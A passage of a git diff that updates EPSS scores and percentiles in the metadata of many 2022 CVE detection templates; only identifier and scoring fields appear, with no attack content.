cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_msp:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_plus:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_oputils:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 3b953c7746f..3b81808be68 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-37190 cwe-id: CWE-732 epss-score: 0.82094 - epss-percentile: 0.99173 + epss-percentile: 0.99175 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 6a957f8c8d3..ab0954d308f 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-37191 cwe-id: CWE-829 epss-score: 0.46367 - epss-percentile: 0.97556 + epss-percentile: 0.97551 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index 01ced161c06..8339fd19457 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-37299 cwe-id: CWE-22 epss-score: 0.17152 - epss-percentile: 0.94791 + epss-percentile: 0.9479 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3766.yaml b/http/cves/2022/CVE-2022-3766.yaml index e87256e260a..9e3bc0cd624 100644 --- a/http/cves/2022/CVE-2022-3766.yaml +++ b/http/cves/2022/CVE-2022-3766.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3766 cwe-id: CWE-79 epss-score: 0.04657 - epss-percentile: 0.8899 + epss-percentile: 0.88987 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 2195a10903d..0337fbb9c9e 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-3768 cwe-id: CWE-89 epss-score: 0.56283 - epss-percentile: 0.98028 + epss-percentile: 0.98027 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37932.yaml b/http/cves/2022/CVE-2022-37932.yaml index c21290afdf4..0508386ebc7 100644 --- a/http/cves/2022/CVE-2022-37932.yaml +++ b/http/cves/2022/CVE-2022-37932.yaml @@ -14,8 +14,8 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-37932 - epss-score: 0.76214 - epss-percentile: 0.98882 + epss-score: 0.79616 + epss-percentile: 0.99048 cpe: cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 2691c0753b1..4b4c60490a6 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-3800 cwe-id: CWE-707,CWE-89 epss-score: 0.25872 - epss-percentile: 0.96101 + epss-percentile: 0.96104 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3805.yaml b/http/cves/2022/CVE-2022-3805.yaml index b1d66235055..cc207f6c59c 100644 --- a/http/cves/2022/CVE-2022-3805.yaml +++ b/http/cves/2022/CVE-2022-3805.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3805 cwe-id: CWE-79 epss-score: 0.12506 - epss-percentile: 0.93713 + epss-percentile: 0.9371 cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38130.yaml b/http/cves/2022/CVE-2022-38130.yaml index e1ee7a52fde..22e9306caa0 100644 --- a/http/cves/2022/CVE-2022-38130.yaml +++ b/http/cves/2022/CVE-2022-38130.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-38130 - epss-score: 0.79442 - epss-percentile: 0.99038 + epss-score: 0.69704 + epss-percentile: 0.98608 cwe-id: CWE-89 cpe: cpe:2.3:a:keysight:sensor_management_server:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 34ed9cabee6..f033b7125a3 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38131 cwe-id: CWE-601 - epss-score: 0.03774 - epss-percentile: 0.87718 + epss-score: 0.024 + epss-percentile: 0.84654 cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index ad85e06b8a2..d476b02065e 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-38295 cwe-id: CWE-79 epss-score: 0.33662 - epss-percentile: 0.9681 + epss-percentile: 0.96811 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index fdc76d93d07..63577a08d77 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.82103 - epss-percentile: 0.99174 + epss-score: 0.80622 + epss-percentile: 0.99096 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index a9cd0316dda..79d61a208de 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38463 cwe-id: CWE-79 - epss-score: 0.29421 - epss-percentile: 0.96455 + epss-score: 0.29034 + epss-percentile: 0.96432 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index ccc84bfae3b..6423d835cb5 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-38467 cwe-id: CWE-79 epss-score: 0.11824 - epss-percentile: 0.93508 + epss-percentile: 0.93502 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index f6be173b873..25baab4971e 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-38553 cwe-id: CWE-79 epss-score: 0.07869 - epss-percentile: 0.91751 + epss-percentile: 0.91749 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38627.yaml b/http/cves/2022/CVE-2022-38627.yaml index 15e2b41f602..282fc16fcc1 100644 --- a/http/cves/2022/CVE-2022-38627.yaml +++ b/http/cves/2022/CVE-2022-38627.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38627 epss-score: 0.67453 - epss-percentile: 0.98513 + epss-percentile: 0.98515 cwe-id: CWE-89 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 9b28a525e06..d673225a17b 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-38637 cwe-id: CWE-89 epss-score: 0.25615 - epss-percentile: 0.96066 + epss-percentile: 0.96069 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3869.yaml b/http/cves/2022/CVE-2022-3869.yaml index 499abd110b7..955788165b6 100644 --- a/http/cves/2022/CVE-2022-3869.yaml +++ b/http/cves/2022/CVE-2022-3869.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-3869 cwe-id: CWE-79 epss-score: 0.13165 - epss-percentile: 0.9391 + epss-percentile: 0.93905 metadata: verified: true max-request: 1 diff --git a/http/cves/2022/CVE-2022-38812.yaml b/http/cves/2022/CVE-2022-38812.yaml index e85ff980368..7b6ca2dc29a 100644 --- a/http/cves/2022/CVE-2022-38812.yaml +++ b/http/cves/2022/CVE-2022-38812.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-38812 cwe-id: CWE-89 epss-score: 0.14202 - epss-percentile: 0.94177 + epss-percentile: 0.94172 metadata: verified: true max-request: 2 diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 8566fa0e0ba..76f91ce1c09 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-38870 cwe-id: CWE-306 epss-score: 0.86241 - epss-percentile: 0.99379 + epss-percentile: 0.9938 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 0e4b8a87eee..6ee62c642f5 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-39048 cwe-id: CWE-79 epss-score: 0.20219 - epss-percentile: 0.95316 + epss-percentile: 0.95318 cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index aed0c69e5b6..eeafd7359b1 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39195 cwe-id: CWE-79 - epss-score: 0.29329 - epss-percentile: 0.96448 + epss-score: 0.31385 + epss-percentile: 0.96631 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index e527c250f16..a83ce24534f 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-3934 cwe-id: CWE-79 epss-score: 0.10041 - epss-percentile: 0.92847 + epss-percentile: 0.9284 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index edc50c2d36b..ba52f739e3a 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3980 cwe-id: CWE-611 epss-score: 0.86806 - epss-percentile: 0.99402 + epss-percentile: 0.99404 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 4e3934bb39d..044b38aeaac 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-3982 cwe-id: CWE-434 epss-score: 0.82236 - epss-percentile: 0.99183 + epss-percentile: 0.99184 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 23e23593697..0b0532ea204 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-39960 cwe-id: CWE-862 epss-score: 0.7815 - epss-percentile: 0.9897 + epss-percentile: 0.98969 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index e095618020b..5126ebc781d 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-40022 cwe-id: CWE-77 epss-score: 0.90838 - epss-percentile: 0.99607 + epss-percentile: 0.99606 cpe: cpe:2.3:h:microchip:syncserver_s650:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index acdccb4b9eb..e1781b77636 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-40047 cwe-id: CWE-79 epss-score: 0.19551 - epss-percentile: 0.95216 + epss-percentile: 0.95214 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index cf6bdaba749..528b2efc51f 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-40127 cwe-id: CWE-94 epss-score: 0.93736 - epss-percentile: 0.9984 + epss-percentile: 0.99841 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index e604d20d77f..d0661dd0a0d 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-40359 cwe-id: CWE-79 epss-score: 0.12355 - epss-percentile: 0.93668 + epss-percentile: 0.93663 cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 8949f197133..a704564d17b 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-4057 cwe-id: CWE-425 epss-score: 0.58814 - epss-percentile: 0.98145 + epss-percentile: 0.98144 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40624.yaml b/http/cves/2022/CVE-2022-40624.yaml index ea97b3daa8d..45db60c87dd 100644 --- a/http/cves/2022/CVE-2022-40624.yaml +++ b/http/cves/2022/CVE-2022-40624.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-40624 cwe-id: CWE-78 epss-score: 0.91092 - epss-percentile: 0.99624 + epss-percentile: 0.99622 cpe: cpe:2.3:a:pfsense:pfblockerng:*:*:*:*:*:*:*:* metadata: vendor: pfsense diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 664f7495151..a1cf1bac597 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-4063 cwe-id: CWE-22 epss-score: 0.90722 - epss-percentile: 0.99599 + epss-percentile: 0.99597 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 3fe58bb332d..9cebe35495b 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-40684 cwe-id: CWE-287 epss-score: 0.94427 - epss-percentile: 0.99982 + epss-percentile: 0.99981 cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index e1786a0d84e..99ccf9e2f38 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-40843 cwe-id: CWE-287 epss-score: 0.40404 - epss-percentile: 0.97228 + epss-percentile: 0.97227 cpe: cpe:2.3:h:tenda:ac1200_v-w15ev2:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 2a520713ded..27951425da6 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-40881 cwe-id: CWE-77 epss-score: 0.93672 - epss-percentile: 0.99833 + epss-percentile: 0.99835 cpe: cpe:2.3:h:contec:solarview_compact:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 7a631f77378..f956d2e67d9 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-41441 cwe-id: CWE-79 epss-score: 0.08812 - epss-percentile: 0.92282 + epss-percentile: 0.92275 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 5b665c78960..89e369a6b08 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-41473 cwe-id: CWE-79 epss-score: 0.2185 - epss-percentile: 0.95577 + epss-percentile: 0.95581 cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41800.yaml b/http/cves/2022/CVE-2022-41800.yaml index 798adc386d5..f28e43d6606 100644 --- a/http/cves/2022/CVE-2022-41800.yaml +++ b/http/cves/2022/CVE-2022-41800.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-41800 cwe-id: CWE-77 epss-score: 0.90794 - epss-percentile: 0.99604 + epss-percentile: 0.99602 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 80c2ed782cb..65f123c3e20 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-42094 cwe-id: CWE-79 epss-score: 0.38028 - epss-percentile: 0.97092 + epss-percentile: 0.97094 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index e6c3684166b..61ff8e449c2 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-42095 cwe-id: CWE-79 epss-score: 0.42134 - epss-percentile: 0.97326 + epss-percentile: 0.97323 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 017a9328a35..984253219b7 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-42096 cwe-id: CWE-79 epss-score: 0.21351 - epss-percentile: 0.95515 + epss-percentile: 0.95517 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42118.yaml b/http/cves/2022/CVE-2022-42118.yaml index c5d1924d051..9725d165dbc 100644 --- a/http/cves/2022/CVE-2022-42118.yaml +++ b/http/cves/2022/CVE-2022-42118.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-42118 cwe-id: CWE-79 epss-score: 0.08478 - epss-percentile: 0.92091 + epss-percentile: 0.92086 cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: vendor: liferay diff --git a/http/cves/2022/CVE-2022-42149.yaml b/http/cves/2022/CVE-2022-42149.yaml index 50d65651d94..bce1ad53f0f 100644 --- a/http/cves/2022/CVE-2022-42149.yaml +++ b/http/cves/2022/CVE-2022-42149.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42149 cwe-id: CWE-918 epss-score: 0.42841 - epss-percentile: 0.97369 + epss-percentile: 0.97366 cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index bd28ff9d04d..99bdbdd04b3 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-4260 cwe-id: CWE-79 epss-score: 0.0097 - epss-percentile: 0.76138 + epss-percentile: 0.76131 cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index b504b863184..0087bb60dff 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-42747 cwe-id: CWE-79 epss-score: 0.03115 - epss-percentile: 0.86437 + epss-percentile: 0.86439 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 5276a20747c..7cd6234846e 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-42748 cwe-id: CWE-79 epss-score: 0.02714 - epss-percentile: 0.85515 + epss-percentile: 0.85511 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index f7f66c59952..a68c53227f3 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-42749 cwe-id: CWE-79 epss-score: 0.02714 - epss-percentile: 0.85515 + epss-percentile: 0.85511 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index 06e2c614de9..116402623d3 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-4301 cwe-id: CWE-79 epss-score: 0.14595 - epss-percentile: 0.94263 + epss-percentile: 0.9426 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 3102dc040b5..efc457114df 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-43014 cwe-id: CWE-79 epss-score: 0.01677 - epss-percentile: 0.81731 + epss-percentile: 0.81726 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index b77547801f5..fc89c268b9d 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-43015 cwe-id: CWE-79 epss-score: 0.01677 - epss-percentile: 0.81731 + epss-percentile: 0.81726 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index b651f41b986..5f7c1152e69 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-43017 cwe-id: CWE-79 epss-score: 0.09911 - epss-percentile: 0.92791 + epss-percentile: 0.92784 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index 8c2a0af8f6a..98bbd39501e 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-43018 cwe-id: CWE-79 epss-score: 0.09911 - epss-percentile: 0.92791 + epss-percentile: 0.92784 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 691c8831bb5..3060e7d0956 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-4306 cwe-id: CWE-79 epss-score: 0.10701 - epss-percentile: 0.93098 + epss-percentile: 0.93092 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 66f50751488..f0f075e6b65 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43164 cwe-id: CWE-79 epss-score: 0.05971 - epss-percentile: 0.90384 + epss-percentile: 0.90385 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index a39f565f2eb..307a94ccc23 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-43167 cwe-id: CWE-79 epss-score: 0.07075 - epss-percentile: 0.91254 + epss-percentile: 0.91253 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index aa14469af1c..7b0384f7e03 100644 